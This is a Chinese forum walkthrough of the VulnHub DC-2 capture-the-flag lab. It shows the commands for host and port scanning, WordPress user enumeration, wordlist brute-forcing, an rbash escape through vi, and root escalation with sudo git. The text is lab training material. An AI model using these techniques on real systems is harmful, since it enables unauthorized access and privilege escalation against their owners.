vulnhub DC-2靶场
1.信息收集扫描存活主机
sudo arp-scan -l
https://s2.loli.net/2023/12/17/eZp4TCS7Mc9zArx.png
扫描主机开放端口
nmap -p- 192.168.42.155
https://s2.loli.net/2023/12/17/rk8ewFGA4By9Khg.png
扫描主机开放端口的具体服务
nmap -p 80,7744 -sV -A 192.168.42.155
https://s2.loli.net/2023/12/17/EWJnFwisQPK4Brk.png
80端口是网页,7744是SSH
日常扫描指纹
whatweb 192.168.42.155
https://s2.loli.net/2023/12/17/OuPY2ByJ8iwQeSr.png
2.漏洞挖掘
访问网站,发现无法访问,猜测为hosts问题
https://s2.loli.net/2023/12/17/yu68Mqk7WOXEofz.png
改写host文件
vim /etc/hosts
192.168.42.155dc-2
https://s2.loli.net/2023/12/17/7QPO54MVBwzXNSo.png
成功访问,开始逛街
https://s2.loli.net/2023/12/17/gSkJKL9Xw7ejIG6.png
点击flag,得到FLAG1
https://s2.loli.net/2023/12/17/Qj1eCTYxNOL3Kfp.png
没东西了,开始扫扫路径
dirb http://dc-2/
https://s2.loli.net/2023/12/17/9iNeHYL6h5rIWE7.png
发现一个登录框,是wordpass建站模板
先一个默认密码,没成功,再想想办法
https://s2.loli.net/2023/12/17/XG2b6NyOFzfatdR.png
找到一个专门找wp账号的工具
wpscan --url dc-2 -e u
https://s2.loli.net/2023/12/17/9QMobYgSzW2aZJx.png
找到三个用户,admin,jerry,tom
https://s2.loli.net/2023/12/17/Zwy1qnoJFAL2KRM.png
既然有账号,就有想办法得到密码,上cewl工具,
cwel http://dc-2 -w dict.txt
https://s2.loli.net/2023/12/17/bVHGgxeRUKFrLnZ.png
有了账号密码,开始爆破
https://s2.loli.net/2023/12/17/sKHpu2RAJxySI3V.png
爆破成功
tom
parturient
jerry
adipiscing
https://s2.loli.net/2023/12/17/84ceQ5WdIo7vaqE.png
3.漏洞利用
登录两个账号看看
https://s2.loli.net/2023/12/17/YNeEpmWzr1kRJwH.png
在jerry账号中page找到FLAG2
https://s2.loli.net/2023/12/17/PbFvhnXJiza7G3u.png
根据FLAG2的内容,我们尝试ssh登录
ssh服务在7744
ssh tom@192.168.42.155 -p 7744
https://s2.loli.net/2023/12/17/jnRzdINl5apm3Bw.png
cat 发现报错(-rbash)
rbash,即受限制的 bash,其可以用作中转服务器(实际上rbash只是bash的一软链接)。它与一般shell的区别在于会限制一些行为,让一些命令无法执行。
于是查找可用命令
echo $PATH
echo /home/tom/usr/bin/*
只有less,ls,scp,vi
https://s2.loli.net/2023/12/17/LJ31mugnGs5D4Xy.png
命令太少,尝试rbash逃逸
export
显示环境变量
https://s2.loli.net/2023/12/17/bx6CjKUQPD5htMG.png
输入以下命令
vi shell
:set shell=/bin/sh
:shell
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin/
https://s2.loli.net/2023/12/17/5Ra4MHGdjqcU2kV.png
逃逸成功,查看flag3.txt
https://s2.loli.net/2023/12/17/xgHV1zCZtn2UqFS.png
理解内容,他让su用户
https://s2.loli.net/2023/12/17/IRmEDPbz7A6Z8S2.png.
4.提升权限
找一下新的FLAG4
find / -name *flag*
https://s2.loli.net/2023/12/17/H3sfp91qVF7K4mU.png
还有FLAG,开始提权
https://s2.loli.net/2023/12/17/ez1oJNQAag3ufnC.png
常规命令
find / -perm -u=s -type f 2>/dev/null
https://s2.loli.net/2023/12/17/DHhosktfMAqSRbe.png
发现没什么特殊的,换命令
发现git命令
sudo -l
https://s2.loli.net/2023/12/17/PIYSu9j3KpJtVbm.png
不会用,有网站
查一下git
https://s2.loli.net/2023/12/17/Emdf18JLNtvpiFR.png
找一条你喜欢的命令
sudo git -p help config
!/bin/sh
https://s2.loli.net/2023/12/17/zvQoqBp2Ke1fILb.png
提权成功,拿到全部FLAG
cat /root/final-flag.txt
https://s2.loli.net/2023/12/17/SrQHtmYigXIxlsO.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]